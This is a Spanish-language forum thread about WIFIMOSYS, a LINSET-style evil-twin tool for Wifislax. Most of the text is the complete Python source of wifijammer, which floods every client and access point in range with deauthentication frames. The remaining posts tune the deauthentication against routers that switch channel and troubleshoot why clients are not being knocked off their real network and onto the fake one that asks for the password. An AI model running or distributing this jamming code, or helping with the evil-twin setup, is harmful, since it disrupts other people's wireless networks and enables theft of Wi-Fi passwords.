Autor Tema: WIFIMOSYS, clon de LINSET  (Leído 112772 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Vodker

  • Moderador
  • *
  • Mensajes: 270
Re:
« Respuesta #120 en: 28-03-2017, 17:10 (Martes) »

probado en Wifislax v4.12 y no funciona


Ya lo dije más arriba:


¿Alguien con Wifislax64, cierta soltura en usar Wifimosys y suficientes cacharretes...



Aprendiendo... o al menos intentándolo.

Warcry_returns

  • Visitante
Re: WIFIMOSYS, clon de LINSET
« Respuesta #121 en: 28-03-2017, 17:36 (Martes) »

- Desautentificación mejorada con wifijammer en lugar de aireplay-ng (no he podido probarlo con routers que hacen channel hopping, pero en teoría ahora desautentifica a los clientes conectados, no al punto de acceso).


esto es buenisimo  >:( >:( >:(

¿y en que te basas para decir que es mejor que aireplay?

¿has leido el codigo de wifijammer?

yo lo habri en su dia, y a no ser que haya cambiado no veo ninguna funcionalidad distinta a las que tiene aireplay.

los dos consisten en mandar paquetes deauth, luego ¿cual es la diferencia?

¿que uno esta escrito en c y el otro en python?

Código: [Seleccionar]
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-

import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl

# Console colors
W  = '\033[0m'  # white (normal)
R  = '\033[31m' # red
G  = '\033[32m' # green
O  = '\033[33m' # orange
B  = '\033[34m' # blue
P  = '\033[35m' # purple
C  = '\033[36m' # cyan
GR = '\033[37m' # gray
T  = '\033[93m' # tan

def parse_args():
    #Create the arguments
    parser = argparse.ArgumentParser()

    parser.add_argument("-s",
                        "--skip",
                        nargs='*',
                        default=[],
                        help="Skip deauthing this MAC address. \
                                Example: -s 00:11:BB:33:44:AA")
    parser.add_argument("-i",
                        "--interface",
                        help="Choose monitor mode interface. \
                                By default script will find the most powerful \
                                interface and starts monitor mode on it. \
                                Example: -i mon5")
    parser.add_argument("-c",
                        "--channel",
                        help="Listen on and deauth only clients on the specified channel. \
                                Example: -c 6")
    parser.add_argument("-m",
                        "--maximum",
                        help="Choose the maximum number of clients to deauth. \
                                List of clients will be emptied and repopulated \
                                after hitting the limit. Example: -m 5")
    parser.add_argument("-n",
                        "--noupdate",
                        help="Do not clear the deauth list when the maximum (-m) \
                                number of client/AP combos is reached. \
                                Must be used in conjunction with -m. \
                                Example: -m 10 -n",
                        action='store_true')
    parser.add_argument("-t",
                        "--timeinterval",
                        help="Choose the time interval between packets being sent. \
                                Default is as fast as possible. \
                                If you see scapy errors like 'no buffer space' \
                                try: -t .00001")
    parser.add_argument("-p",
                        "--packets",
                        help="Choose the number of packets to send in each deauth burst. \
                                Default value is 1; \
                                1 packet to the client and 1 packet to the AP. \
                                Send 2 deauth packets to the client \
                                and 2 deauth packets to the AP: -p 2")
    parser.add_argument("-d",
                        "--directedonly",
                        help="Skip the deauthentication packets to the broadcast \
                                address of the access points and only send them \
                                to client/AP pairs",
                        action='store_true')
    parser.add_argument("-a",
                        "--accesspoint",
                        nargs='*',
                        default=[],
                        help="Enter the SSID or MAC address of a specific access point to target")
    parser.add_argument("--world",
                        help="N. American standard is 11 channels but the rest \
                                of the world it's 13 so this options enables the \
                                scanning of 13 channels",
                        action="store_true")

    return parser.parse_args()


########################################
# Begin interface info and manipulation
########################################

def get_mon_iface(args):
    global monitor_on
    monitors, interfaces = iwconfig()
    if args.interface:
        monitor_on = True
        return args.interface
    if len(monitors) > 0:
        monitor_on = True
        return monitors[0]
    else:
        # Start monitor mode on a wireless interface
        print '['+G+'*'+W+'] Finding the most powerful interface...'
        interface = get_iface(interfaces)
        monmode = start_mon_mode(interface)
        return monmode

def iwconfig():
    monitors = []
    interfaces = {}
    try:
        proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
    except OSError:
        sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
    for line in proc.communicate()[0].split('\n'):
        if len(line) == 0: continue # Isn't an empty string
        if line[0] != ' ': # Doesn't start with space
            wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
            if not wired_search: # Isn't wired
                iface = line[:line.find(' ')] # is the interface
                if 'Mode:Monitor' in line:
                    monitors.append(iface)
                elif 'IEEE 802.11' in line:
                    if "ESSID:\"" in line:
                        interfaces[iface] = 1
                    else:
                        interfaces[iface] = 0
    return monitors, interfaces

def get_iface(interfaces):
    scanned_aps = []

    if len(interfaces) < 1:
        sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
    if len(interfaces) == 1:
        for interface in interfaces:
            return interface

    # Find most powerful interface
    for iface in interfaces:
        count = 0
        proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
        for line in proc.communicate()[0].split('\n'):
            if ' - Address:' in line: # first line in iwlist scan for a new AP
               count += 1
        scanned_aps.append((count, iface))
        print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
    try:
        interface = max(scanned_aps)[1]
        return interface
    except Exception as e:
        for iface in interfaces:
            interface = iface
            print '['+R+'-'+W+'] Minor error:',e
            print '    Starting monitor mode on '+G+interface+W
            return interface

def start_mon_mode(interface):
    print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
    try:
        os.system('ifconfig %s down' % interface)
        os.system('iwconfig %s mode monitor' % interface)
        os.system('ifconfig %s up' % interface)
        return interface
    except Exception:
        sys.exit('['+R+'-'+W+'] Could not start monitor mode')

def remove_mon_iface(mon_iface):
    os.system('ifconfig %s down' % mon_iface)
    os.system('iwconfig %s mode managed' % mon_iface)
    os.system('ifconfig %s up' % mon_iface)

def mon_mac(mon_iface):
    '''
    http://stackoverflow.com/questions/159137/getting-mac-address
    '''
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
    mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
    print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
    return mac

########################################
# End of interface info and manipulation
########################################


def channel_hop(mon_iface, args):
    '''
    First time it runs through the channels it stays on each channel for 5 seconds
    in order to populate the deauth list nicely. After that it goes as fast as it can
    '''
    global monchannel, first_pass

    channelNum = 0
    maxChan = 11 if not args.world else 13
    err = None

    while 1:
        if args.channel:
            with lock:
                monchannel = args.channel
        else:
            channelNum +=1
            if channelNum > maxChan:
                channelNum = 1
                with lock:
                    first_pass = 0
            with lock:
                monchannel = str(channelNum)

            try:
                proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
            except OSError:
                print '['+R+'-'+W+'] Could not execute "iw"'
                os.kill(os.getpid(),SIGINT)
                sys.exit(1)
            for line in proc.communicate()[1].split('\n'):
                if len(line) > 2: # iw dev shouldnt display output unless there's an error
                    err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W

        output(err, monchannel)
        if args.channel:
            time.sleep(.05)
        else:
            # For the first channel hop thru, do not deauth
            if first_pass == 1:
                time.sleep(1)
                continue

        deauth(monchannel)


def deauth(monchannel):
    '''
    addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
    multi-APs to one gateway. Constantly scans the clients_APs list and
    starts a thread to deauth each instance
    '''

    pkts = []

    if len(clients_APs) > 0:
        with lock:
            for x in clients_APs:
                client = x[0]
                ap = x[1]
                ch = x[2]
                # Can't add a RadioTap() layer as the first layer or it's a malformed
                # Association request packet?
                # Append the packets to a new list so we don't have to hog the lock
                # type=0, subtype=12?
                if ch == monchannel:
                    deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
                    deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
                    pkts.append(deauth_pkt1)
                    pkts.append(deauth_pkt2)
    if len(APs) > 0:
        if not args.directedonly:
            with lock:
                for a in APs:
                    ap = a[0]
                    ch = a[1]
                    if ch == monchannel:
                        deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
                        pkts.append(deauth_ap)

    if len(pkts) > 0:
        # prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
        if not args.timeinterval:
            args.timeinterval = 0
        if not args.packets:
            args.packets = 1

        for p in pkts:
            send(p, inter=float(args.timeinterval), count=int(args.packets))

def output(err, monchannel):
    os.system('clear')
    if err:
        print err
    else:
        print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
    if len(clients_APs) > 0:
        print '                  Deauthing                 ch   ESSID'
    # Print the deauth list
    with lock:
        for ca in clients_APs:
            if len(ca) > 3:
                print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
            else:
                print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
    if len(APs) > 0:
        print '\n      Access Points     ch   ESSID'
    with lock:
        for ap in APs:
            print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
    print ''

def noise_filter(skip, addr1, addr2):
    # Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
    ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
    if skip:
        ignore += [addr.lower() for addr in skip]
    for i in ignore:
        if i in addr1 or i in addr2:
            return True

def cb(pkt):
    '''
    Look for dot11 packets that aren't to or from broadcast address,
    are type 1 or 2 (control, data), and append the addr1 and addr2
    to the list of deauth targets.
    '''
    global clients_APs, APs

    # return these if's keeping clients_APs the same or just reset clients_APs?
    # I like the idea of the tool repopulating the variable more
    if args.maximum:
        if args.noupdate:
            if len(clients_APs) > int(args.maximum):
                return
        else:
            if len(clients_APs) > int(args.maximum):
                with lock:
                    clients_APs = []
                    APs = []

    # We're adding the AP and channel to the deauth list at time of creation rather
    # than updating on the fly in order to avoid costly for loops that require a lock
    if pkt.haslayer(Dot11):
        if pkt.addr1 and pkt.addr2:
            pkt.addr1 = pkt.addr1.lower()
            pkt.addr2 = pkt.addr2.lower()

            # Filter out all other APs and clients if asked
            if args.accesspoint:
                # track bssid for essid
                if (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)) and pkt[Dot11Elt].info in args.accesspoint:
                    args.accesspoint.add(pkt[Dot11].addr3.lower())
                # bail if bssid is not in target list
                if not args.accesspoint.intersection([pkt.addr1.lower(), pkt.addr2.lower()]):
                    # pkt does not match our target list
                    return

            if args.skip:
                if pkt.addr2 in args.skip:
                    return

            # Check if it's added to our AP list
            if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
                APs_add(clients_APs, APs, pkt, args.channel, args.world)

            # Ignore all the noisy packets like spanning tree

            #if noise_filter(skip, pkt.addr1, pkt.addr2):
            #    return

            # Management = 1, data = 2
            if pkt.type in [1, 2]:
                clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)

def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
    ssid       = pkt[Dot11Elt].info
    bssid      = pkt[Dot11].addr3.lower()
    try:
        # Thanks to airoscapy for below
        ap_channel = str(ord(pkt[Dot11Elt:3].info))
        chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
        if ap_channel not in chans:
            return

        if chan_arg:
            if ap_channel != chan_arg:
                return

    except Exception as e:
        return

    if len(APs) == 0:
        with lock:
            return APs.append([bssid, ap_channel, ssid])
    else:
        for b in APs:
            if bssid in b[0]:
                return
        with lock:
            return APs.append([bssid, ap_channel, ssid])

def clients_APs_add(clients_APs, addr1, addr2):
    if len(clients_APs) == 0:
        if len(APs) == 0:
            with lock:
                return clients_APs.append([addr1, addr2, monchannel])
        else:
            AP_check(addr1, addr2)

    # Append new clients/APs if they're not in the list
    else:
        for ca in clients_APs:
            if addr1 in ca and addr2 in ca:
                return

        if len(APs) > 0:
            return AP_check(addr1, addr2)
        else:
            with lock:
                return clients_APs.append([addr1, addr2, monchannel])

def AP_check(addr1, addr2):
    for ap in APs:
        if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
            with lock:
                return clients_APs.append([addr1, addr2, ap[1], ap[2]])

def stop(signal, frame):
    if monitor_on:
        sys.exit('\n['+R+'!'+W+'] Closing')
    else:
        remove_mon_iface(mon_iface)
        os.system('service network-manager restart')
        sys.exit('\n['+R+'!'+W+'] Closing')

if __name__ == "__main__":
    if os.geteuid():
        sys.exit('['+R+'-'+W+'] Please run as root')
    clients_APs = []
    APs = []
    DN = open(os.devnull, 'w')
    lock = Lock()
    args = parse_args()
    args.skip = list(map(str.lower, args.skip))
    # lowercase bssids while leaving essids intact
    args.accesspoint = set(_.lower() if ':' in _ else _ for _ in args.accesspoint)
    monitor_on = None
    mon_iface = get_mon_iface(args)
    conf.iface = mon_iface
    mon_MAC = mon_mac(mon_iface)
    first_pass = 1

    # Start channel hopping
    hop = Thread(target=channel_hop, args=(mon_iface, args))
    hop.daemon = True
    hop.start()

    signal(SIGINT, stop)

    try:
        sniff(iface=mon_iface, store=0, prn=cb)
    except Exception as msg:
        remove_mon_iface(mon_iface)
        os.system('service network-manager restart')
        print '\n['+R+'!'+W+'] Closing'
        sys.exit(0)
« Última modificación: 28-03-2017, 17:37 (Martes) por ωarcry »

Desconectado Vodker

  • Moderador
  • *
  • Mensajes: 270
Re: WIFIMOSYS, clon de LINSET
« Respuesta #122 en: 28-03-2017, 18:06 (Martes) »

esto es buenisimo  >:( >:( >:(

¿y en que te basas para decir que es mejor que aireplay?

¿has leido el codigo de wifijammer?

yo lo habri en su dia, y a no ser que haya cambiado no veo ninguna funcionalidad distinta a las que tiene aireplay.

los dos consisten en mandar paquetes deauth, luego ¿cual es la diferencia?

¿que uno esta escrito en c y el otro en python?


Pues la diferencia es que, según el autor la opción -p funciona y permite ayudar en el tema de la desautentificación ante un router que cambia de canal al repartir los paquetes y así que no sea constantemente, que es lo que estaba intentando conseguir. Y porque ya probé tanto con aireplay-ng como con mdk3 y este va mejor, más rápido, es más bonico y más apañao  ;D

Código: [Seleccionar]
-p, Send 5 packets to the client from the AP and 5 packets to the AP from the client along with 5 packets to the broadcast address of the AP
« Última modificación: 28-03-2017, 18:18 (Martes) por Vodker »
Aprendiendo... o al menos intentándolo.

Warcry_returns

  • Visitante
Re: WIFIMOSYS, clon de LINSET
« Respuesta #123 en: 28-03-2017, 18:30 (Martes) »

Pues la diferencia es que, según el autor la opción -p funciona y permite ayudar en el tema de la desautentificación ante un router que cambia de canal al repartir los paquetes y así que no sea constantemente, que es lo que estaba intentando conseguir. Y porque ya probé tanto con aireplay-ng como con mdk3 y este va mejor, más rápido, es más bonico y más apañao  ;D

Código: [Seleccionar]
-p, Send 5 packets to the client from the AP and 5 packets to the AP from the client along with 5 packets to the broadcast address of the AP

mi ingles esta oxidadisimo, pero esto es lo que me pone el traductor de google

Citar
-p, envía 5 paquetes al cliente del AP y 5 paquetes al AP del cliente junto con 5 paquetes a la dirección de difusión del AP

no veo ahí nada de cambio de canal.

eso por un lado, y por otro, wifijammer te permite tener hostapd en un canal con el fake ap y con el mismo interface estar en otro canal mandando paquetes deauth?

porque yo lo que tengo probado es que con el mismo interface no puedes estar en misa y repicando las campanas.  ;)

oye si lo permite me la envaino y eso si seria interesante.

Desconectado Vodker

  • Moderador
  • *
  • Mensajes: 270
Re: WIFIMOSYS, clon de LINSET
« Respuesta #124 en: 28-03-2017, 18:42 (Martes) »

no veo ahí nada de cambio de canal.

eso por un lado, y por otro, wifijammer te permite tener hostapd en un canal con el fake ap y con el mismo interface estar en otro canal mandando paquetes deauth?

porque yo lo que tengo probado es que con el mismo interface no puedes estar en misa y repicando las campanas.  ;)

oye si lo permite me la envaino y eso si seria interesante.


No, no he dicho que cambie de canal, eso sería verdadera magia con un mismo interface. Lo que digo es que el autor pone que la opción -p va cambiando entre atacar al AP y atacar a los clientes repartiendo paquetes, con lo cual no es un ataque constante al AP (sí lo es, pero a diferentes objetivos), lo que creo que puede ayudar a que los routers que cambian de canal ante un ataque masivo aguanten más tiempo sin cambiar o que no cambien de canal. Aireplay y mdk3 pueden enviar menos paquetes de deauth para no ser tan agresivos, pero vi bien la opción de enviar todos los paquetes posibles cambiando de objetivo para mantener esa constancia sin perder agresividad.

Pero bueno, que está ahí para ser probado y que si no funciona o no gusta, pues siempre se puede volver al aireplay.... ;)
« Última modificación: 28-03-2017, 18:44 (Martes) por Vodker »
Aprendiendo... o al menos intentándolo.

jorose1987

  • Visitante
Re:
« Respuesta #125 en: 28-03-2017, 21:43 (Martes) »
Ahh, y yo creí que el ataque seguía válido aun cambiando de canal el router tras su reinicio.

Antes lo comprobé y efectivamente al cambiar de canal el router ya el ataque no es válido.

Entendí que haría eso la nueva actualización, jaja. Ahora veo que es imposible esto.

Por tanto, Vodker si es posible ¿podrías incluir las otras novedades y arreglos a una versión con aireplay-ng? creo que con esta desautentificación funcionaría mejor y todo estaría como antes.

De todas maneras darte las gracias por tu gran trabajo.

ampamer

  • Visitante
Re:
« Respuesta #126 en: 28-03-2017, 23:45 (Martes) »
Ahh, y yo creí que el ataque seguía válido aun cambiando de canal el router tras su reinicio.

Antes lo comprobé y efectivamente al cambiar de canal el router ya el ataque no es válido.


 A todo esto , has vuelto a realizar  las pruebas con un router que sepas que cambia de canal  ?? O solo piensas que no funciona solo por lo que has  leído, yo aun no eh tenido chance de hacerlo pero tal vez deberías de hacer las pruebas y luego contarnos si realmente funciona o no

jorose1987

  • Visitante
Re:
« Respuesta #127 en: 28-03-2017, 23:52 (Martes) »
Sí, lo dije antes. Al cambiar de canal el router el ataque ya no funciona pues no desautentifica al cliente. Hay que volver a iniciar el ataque para que vuelva a funcionar.

Yo creí que era eso lo que solucionó Vodker pero parece ser que su nueva actualización permite que el cambio de canal sea menos frecuente debido a que los paquetes de desautentificación se reparten ahora a clientes y no siempre al router o eso he entendido.

Aún así el trabajo de Vodker es impresionante.

Si pudiese ser que vuelva a poner el mdk3 en vez de wifijamer y volver a lo de antes incluyendo los nuevos arreglos estaría genial.

Saludos.

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14069
Re: WIFIMOSYS, clon de LINSET
« Respuesta #128 en: 29-03-2017, 08:00 (Miércoles) »
creo que tambien podria hacerse incluyendo la opcion elegir como desautenticar..y ya esta.

hay poder elegir si wifijammer o aireplay

jorose1987

  • Visitante
Re: Re: WIFIMOSYS, clon de LINSET
« Respuesta #129 en: 29-03-2017, 11:41 (Miércoles) »
creo que tambien podria hacerse incluyendo la opcion elegir como desautenticar..y ya esta.

hay poder elegir si wifijammer o aireplay
Eso estaría muy bien porque creo que wifijammer también puede funcionar muy bien para evitar más cambios de canal. Estaría genial con esa opción.

orquidea01

  • Visitante
Re: WIFIMOSYS, clon de LINSET
« Respuesta #130 en: 01-04-2017, 23:22 (Sábado) »
Ante todo, daros las gracias por el gran aporte que realizáis en toda la comunidad.
Bueno, mi caso es que al realizar un ataque a mi router sigo navegando con las tables y moviles que tengo, si que si me voy a escanear redes veo una con el mismo nombre que la mía, pero no me desautentifica a ningún cliente y sigo navegando sin problemas, no teniendo que preocuparme de buscar otra red o estar metiendo nada de nada en ningún sitio.
Si que he probado a conectarme a la red virtual que ha generado y entonces aparece el la ventanita de que tengo que introducir la contraseña, pero claro como la red buena no la bloquea, pues ningún cliente tiene que preocuparse de buscar.
¿Me podrias echar una mano para ver donde puedo tener el problema?
Muchas gracias.

Desconectado Vodker

  • Moderador
  • *
  • Mensajes: 270
Re: WIFIMOSYS, clon de LINSET
« Respuesta #131 en: 02-04-2017, 12:14 (Domingo) »
Ante todo, daros las gracias por el gran aporte que realizáis en toda la comunidad.
Bueno, mi caso es que al realizar un ataque a mi router sigo navegando con las tables y moviles que tengo, si que si me voy a escanear redes veo una con el mismo nombre que la mía, pero no me desautentifica a ningún cliente y sigo navegando sin problemas, no teniendo que preocuparme de buscar otra red o estar metiendo nada de nada en ningún sitio.
Si que he probado a conectarme a la red virtual que ha generado y entonces aparece el la ventanita de que tengo que introducir la contraseña, pero claro como la red buena no la bloquea, pues ningún cliente tiene que preocuparse de buscar.
¿Me podrias echar una mano para ver donde puedo tener el problema?
Muchas gracias.

¿Tu router es de los que cambia de canal ante un ataque deauth? Comprueba a ver si se está haciendo la desautentificación a un canal y tu router va por otro.

Saludos.
Aprendiendo... o al menos intentándolo.

ampamer

  • Visitante
Re: WIFIMOSYS, clon de LINSET
« Respuesta #132 en: 02-04-2017, 17:20 (Domingo) »
Hola Amigo vodker, se hará la implementación de ambas opciones wa wifijamer y airoscritp para la siguiente actualización ??

orquidea01

  • Visitante
Re: WIFIMOSYS, clon de LINSET
« Respuesta #133 en: 02-04-2017, 23:39 (Domingo) »
Gracias por responder Vodker, mi router no cambia de canal al estar realizado el ataque, vamos lo tengo fijo manualmente en el canal 11 y acabo de realizarle un ataque y sigue en ese canal, mientras con el pc esta atacando yo con mi móvil navego perfectamente, por cualquier pagina y me he metido con el móvil en la configuración de mi router y sigue en el canal 11.

Si me puedes orientar, te lo agradezco.
 :'(


Desconectado drvalium

  • Moderador Global
  • *
  • Mensajes: 17437
  • Misántropo
Re: WIFIMOSYS, clon de LINSET
« Respuesta #134 en: 03-04-2017, 00:05 (Lunes) »
hi

atacar un móvil no suele funcionar, por motivos que desconozco nunca he conseguido un Handshake de un movil/tablet.

nipponsensei

  • Visitante
Re: WIFIMOSYS, clon de LINSET
« Respuesta #135 en: 03-04-2017, 05:04 (Lunes) »
Muchas gracias por esta herramienta, me facilitó mucho las pruebas que tenía que hacer con mi modem pero algo curioso me sucede: tanto con el linset original como con esta modificación, en la última versión de wifislax no me muestran los clientes conectados, tuve que bajar la 4.8 y todo funcionó de maravilla. Parece que falta algún módulo o dejaron de darle algo de soporte a mi tarjeta.

Desconectado Vodker

  • Moderador
  • *
  • Mensajes: 270
Re: WIFIMOSYS, clon de LINSET
« Respuesta #136 en: 03-04-2017, 10:43 (Lunes) »
Hola Amigo vodker, se hará la implementación de ambas opciones wa wifijamer y airoscritp para la siguiente actualización ??

Para la próxima habrá grandes cambios. Hasta ahí puedo leer.

Muchas gracias por esta herramienta, me facilitó mucho las pruebas que tenía que hacer con mi modem pero algo curioso me sucede: tanto con el linset original como con esta modificación, en la última versión de wifislax no me muestran los clientes conectados, tuve que bajar la 4.8 y todo funcionó de maravilla. Parece que falta algún módulo o dejaron de darle algo de soporte a mi tarjeta.

¿Y qué tarjeta tienes? Si no aportas más datos aquí no tenemos una bola de cristal para saberlo. Wifimosys, al igual que Linset, es un script. Esto quiere decir que no incorpora ninguna herramienta sino que automatiza y hace "fáciles" las ya existentes en Wifislax. Si un proceso de Wifimosys falla (por ejemplo el servidor HTTP) siempre puedes acudir a la herramienta original (en este caso lighttpd) y comprobar su funcionamiento en tu hardware. Si la original te sigue fallando, siempre te fallará en Wifimosys o Linset puesto que el script hace uso de la misma. Si por el contrario la original te funciona bien tras trastear con sus opciones entonces sí se puede arreglar la cosa en Wifimosys trasladando los cambios si los das a conocer.

Saludos.
Aprendiendo... o al menos intentándolo.

nipponsensei

  • Visitante
Re: WIFIMOSYS, clon de LINSET
« Respuesta #137 en: 04-04-2017, 01:09 (Martes) »

¿Y qué tarjeta tienes? Si no aportas más datos aquí no tenemos una bola de cristal para saberlo. Wifimosys, al igual que Linset, es un script. Esto quiere decir que no incorpora ninguna herramienta sino que automatiza y hace "fáciles" las ya existentes en Wifislax. Si un proceso de Wifimosys falla (por ejemplo el servidor HTTP) siempre puedes acudir a la herramienta original (en este caso lighttpd) y comprobar su funcionamiento en tu hardware. Si la original te sigue fallando, siempre te fallará en Wifimosys o Linset puesto que el script hace uso de la misma. Si por el contrario la original te funciona bien tras trastear con sus opciones entonces sí se puede arreglar la cosa en Wifimosys trasladando los cambios si los das a conocer.

Saludos.

No vine en busca de asesoría como tal, solo quería comentar mi experiencia y mi tarjeta es una Broadcom BCM4318, ya es bastante antigua y supongo que por esa razón la última versión de wifislax no le da soporte completo para trabajar con linset o la variante que has desarrollado.
« Última modificación: 04-04-2017, 01:10 (Martes) por nipponsensei »

jorose1987

  • Visitante
Re:
« Respuesta #138 en: 07-04-2017, 11:06 (Viernes) »
Vodker compañero, ¿qué novedades traerá la nueva versión?

Desconectado Vodker

  • Moderador
  • *
  • Mensajes: 270
Re:
« Respuesta #139 en: 08-04-2017, 20:30 (Sábado) »
Vodker compañero, ¿qué novedades traerá la nueva versión?

Pues la más llamativa, un entorno gráfico que hasta ahora me resisto a enseñar ;D. Pero eso solo es estético, habrá más cosas de importancia.
Saludos.
Aprendiendo... o al menos intentándolo.